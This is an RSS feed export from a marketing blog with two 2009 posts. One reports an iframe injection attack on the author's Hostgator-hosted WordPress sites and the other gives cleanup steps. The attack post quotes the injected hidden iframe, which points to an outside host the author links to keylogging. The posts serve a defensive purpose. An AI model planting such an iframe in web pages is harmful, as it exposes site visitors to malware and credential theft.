<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sophie&#039;s Success Shortcuts &#187; Body Tag</title>
	<atom:link href="http://www.sophieslist.com/tag/body-tag/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sophieslist.com</link>
	<description>Shortcuts and Recommendations for Marketers, Mindset, and More</description>
	<lastBuildDate>Wed, 04 May 2011 19:18:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How did I remove the iframe the hackers put on my index pages</title>
		<link>http://www.sophieslist.com/184/remove-iframe-hackers-index/</link>
		<comments>http://www.sophieslist.com/184/remove-iframe-hackers-index/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 15:53:21 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[wordpress blog]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Body Tag]]></category>
		<category><![CDATA[Body Tags]]></category>
		<category><![CDATA[Coaching]]></category>
		<category><![CDATA[Commonality]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Hackers Pages]]></category>
		<category><![CDATA[Havoc]]></category>
		<category><![CDATA[Html Files]]></category>
		<category><![CDATA[Iframe]]></category>
		<category><![CDATA[Iframes]]></category>
		<category><![CDATA[Index File]]></category>
		<category><![CDATA[Index Pages]]></category>
		<category><![CDATA[Index Php]]></category>
		<category><![CDATA[Interruption]]></category>
		<category><![CDATA[Lot]]></category>
		<category><![CDATA[Lt]]></category>
		<category><![CDATA[Manual Hacker]]></category>
		<category><![CDATA[Mindless Robot]]></category>
		<category><![CDATA[Php File]]></category>
		<category><![CDATA[Php Index]]></category>
		<category><![CDATA[Root Level]]></category>
		<category><![CDATA[Screen Shots]]></category>
		<category><![CDATA[Target]]></category>
		<category><![CDATA[Two Ways]]></category>

		<guid isPermaLink="false">http://www.sophieslist.com/2009/remove-iframe-hackers-put-index/</guid>
		<description><![CDATA[I am getting a lot of questions on how to remove the iframes that got hacked onto the index pages, whether index.php, index html, or default.html It is actually relatively easy, and I'll show you two methods, one with using ftp and the other using your file manager that comes with cpanel. Hold on... I [...]]]></description>
			<content:encoded><![CDATA[<p>I am getting a lot of questions on how to remove the iframes that got hacked onto the index pages, whether index.php, index html, or default.html</p>
<p>It is actually relatively easy, and I'll show you two methods, one with using ftp and the other using your file manager that comes with cpanel.</p>
<p>Hold on... I have a coaching client coming... I'll be back later this afternoon to show you step-by-step with screen shots... check back this afternoon... sorry for the interruption... OK?</p>
<p>Sorry... I am back.</p>
<p>Life got suddenly very busy... my students are suddenly producing results... yaaay.</p>
<p>Anyway, here are two ways to recognize and remove the iframes from your index pages.</p>
<p>Method 1: ftp.</p>
<p>ftp into your your site's root level and sort your documents by date.</p>
<p><img src="http://www.sophieslist.com/images/ftp-locate.png" alt="locate and remove iframe hack" /></p>
<p>you may notice that my index.php file was changed on September 5.</p>
<p>This is a blog, and you don't change the index file... ever. so this must have been the hackers' target.</p>
<p>Now, from the result you'll see that this wasn't a manual hacker, it was a little mindless robot sent out the wreak havoc...</p>
<p><img src="http://www.sophieslist.com/images/healthy-index.png" alt="locate and remove iframe hack" /><br />
the above index.php file is the healthy file that comes with your wordpress blog installation. it starts with &lt;?php and ends with ?&gt;</p>
<p>that is how it should be.</p>
<p><img src="http://www.sophieslist.com/images/infected-index.png" alt="locate and remove iframe hack" /></p>
<p>on the above index.php file, please observe the last line. after the closing ?&gt; there is a whole line of code... that is the code you need to remove.</p>
<p><img src="http://www.sophieslist.com/images/infected-line.png" alt="locate and remove iframe hack" /></p>
<p>this is how the whole line looks... Save and upload your file and you are done.</p>
<p>The second category of files that got hacked are files that have body tags in them...  they can be both php or html files. the commonality is that they contain a body tag, that looks like this &lt;body&gt;</p>
<p>Sometimes after the &lt;body there is other code, and then it closes with a &gt; tag. It is still a starting body tag.</p>
<p><img src="http://www.sophieslist.com/images/healthy-index-html.png" alt="locate and remove iframe hack" /></p>
<p>this is (above) how a healthy file looks with body tag</p>
<p><img src="http://www.sophieslist.com/images/infected-index-html.png" alt="locate and remove iframe hack" /></p>
<p>this is (above) how an infected file looks with body tag</p>
<p>you need to delete the line that has the iframe tag &lt;iframe src..to &lt;iframe&gt;.</p>
<p>Third important thing: folder or directory dates also change when files change inside. So if you have subdirectories that have a newer date, please check the index files inside... I found 202 infected files, because my sites have many subdirectories.</p>
<p>Good luck, and please let me know how you are making out.<br />
Was this enough information? Please talk back to me.</p>
<p align="center"><img src="http://www.sophieslist.com/wp-content/plugins/call-to-action/images/three-long.png" /></p><script type="text/javascript">(function() {var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0];s.type = 'text/javascript';s.async = true;s.src = 'http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s, s1);})();</script><a class="DiggThisButton DiggCompact" href="http://digg.com/submit?url=http%3A%2F%2Fwww.sophieslist.com%2F184%2Fremove-iframe-hackers-index%2F"></a>]]></content:encoded>
			<wfw:commentRss>http://www.sophieslist.com/184/remove-iframe-hackers-index/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>All my sites on Hostgator got attacked by iframe hack</title>
		<link>http://www.sophieslist.com/181/sites-hostgator-attacked-iframe/</link>
		<comments>http://www.sophieslist.com/181/sites-hostgator-attacked-iframe/#comments</comments>
		<pubDate>Sun, 06 Sep 2009 03:57:13 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[wordpress blog]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Body Tag]]></category>
		<category><![CDATA[Code Lt]]></category>
		<category><![CDATA[Cpanel Login]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Hostgator]]></category>
		<category><![CDATA[Iframe]]></category>
		<category><![CDATA[iframe hack]]></category>
		<category><![CDATA[iframe to keylogging sites]]></category>
		<category><![CDATA[Index Files]]></category>
		<category><![CDATA[Index Html Files]]></category>
		<category><![CDATA[Index Php]]></category>
		<category><![CDATA[Italy]]></category>
		<category><![CDATA[Keylogger]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Russian Hackers]]></category>
		<category><![CDATA[Scripts]]></category>
		<category><![CDATA[Servers]]></category>
		<category><![CDATA[Tens Of Thousands]]></category>
		<category><![CDATA[Visibility]]></category>

		<guid isPermaLink="false">http://www.sophieslist.com/?p=181</guid>
		<description><![CDATA[At 7 pm tonight my students emailed me that our blog was down. I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code &#60;iframe [...]]]></description>
			<content:encoded><![CDATA[<p><img class="left" src="http://www.sophieslist.com/iframe_hack.jpg" alt="iframe hack wordpress index files" />At 7 pm tonight my students emailed me that our blog was down.</p>
<p>I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code</p>
<p>&lt;iframe src="http://a6t.homeftp.net:8080/ts/in.cgi?open"  width=230 height=0 style="visibility: hidden"&gt;&lt;/iframe&gt;</p>
<p>do not go there...</p>
<p>I googled the topic and found that some Russian hackers have created keylogger sites and the keylogger scripts get all your passwords.</p>
<p>If it is an individual site: your password was compromised.</p>
<p>I have sites on other servers, like this site, and none of those were attacked. I think it is Hostgator that is compromised... so if you have a site on hostgator, please check your index files... and clean them.</p>
<p>I hear in Italy tens of thousands of computers are infected... as a result of the iframe hack that effects every site, but especially wordpress blogs.</p>
<p><a href="http://forums.digitalpoint.com/showthread.php?t=901622" target="_blank">http://forums.digitalpoint.com/showthread.php?t=901622</a></p>
<p><a href="http://wordpress.org/support/topic/277277" target="_blank">http://wordpress.org/support/topic/277277</a></p>
<p>This time the database isn't attacked, only the files. It seems that they get to the sites with ftp... if you can, please change your ftp and cpanel login. I am planning on removing my sites from hostgator.com</p>
<p align="center"><img src="http://www.sophieslist.com/wp-content/plugins/call-to-action/images/double.png" /></p><script type="text/javascript">(function() {var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0];s.type = 'text/javascript';s.async = true;s.src = 'http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s, s1);})();</script><a class="DiggThisButton DiggCompact" href="http://digg.com/submit?url=http%3A%2F%2Fwww.sophieslist.com%2F181%2Fsites-hostgator-attacked-iframe%2F"></a>]]></content:encoded>
			<wfw:commentRss>http://www.sophieslist.com/181/sites-hostgator-attacked-iframe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Served from: sophieslist.com @ 2012-02-05 05:52:32 -->
